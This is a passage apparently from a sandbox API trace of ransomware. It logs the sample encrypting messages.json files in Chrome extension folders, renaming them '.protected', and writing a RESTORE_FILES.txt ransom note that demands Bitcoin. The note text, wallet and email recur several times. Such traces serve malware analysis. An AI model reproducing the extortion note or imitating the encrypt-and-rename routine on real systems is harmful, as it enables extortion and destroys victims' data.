length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.001] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.002] lstrlenA (lpString="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") returned 684 [0080.002] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.002] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.002] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.002] CloseHandle (hObject=0x164) returned 1 [0080.002] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0080.002] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0080.002] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg") returned 141 [0080.002] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0080.002] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0080.002] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\*") returned 143 [0080.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.002] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.002] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.002] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.002] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.002] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\.") returned 143 [0080.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.003] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.003] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.003] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.003] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.003] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\..") returned 144 [0080.003] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.003] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.003] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.003] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") 
returned 155 [0080.003] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.003] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.003] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.003] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") returned 155 [0080.003] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") returned 155 [0080.003] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json") returned 155 [0080.003] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.003] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x12f, lpOverlapped=0x0) returned 1 [0080.004] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffed1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.004] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x12f, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x12f, lpOverlapped=0x0) returned 1 [0080.004] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.004] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.004] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.004] CloseHandle (hObject=0x168) returned 1 [0080.005] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.protected") returned 165 [0080.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\messages.json.protected")) returned 1 [0080.005] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.005] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.005] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\RESTORE_FILES.txt") returned 159 [0080.005] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.005] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.005] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.006] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.006] WriteFile (in: hFile=0x164, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.006] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.006] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.006] CloseHandle (hObject=0x164) returned 1 [0080.006] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.006] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0080.006] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0080.007] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0080.007] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0080.007] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0080.007] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca") returned 141 [0080.007] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0080.007] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0080.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\*") returned 143 [0080.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.007] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.007] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.007] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.007] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.007] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\.") returned 143 [0080.007] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.007] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.007] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.007] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.007] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.007] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.007] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\..") returned 144 [0080.007] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.007] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.007] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.007] lstrcmpiW 
(lpString1="messages.json", lpString2="Windows") returned -1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.007] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.007] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0080.007] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.007] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.008] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.008] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0080.008] StrStrW 
(lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0080.008] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.008] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json") returned 155 [0080.008] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.008] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.009] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.009] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xe5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xe5, lpOverlapped=0x0) returned 1 [0080.009] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.009] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.009] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.010] CloseHandle (hObject=0x168) returned 1 [0080.010] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.protected") returned 165 [0080.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\messages.json.protected")) returned 1 [0080.010] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.010] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.010] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\RESTORE_FILES.txt") returned 159 [0080.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.011] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.011] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.011] lstrlenA (lpString="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") returned 684 [0080.011] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
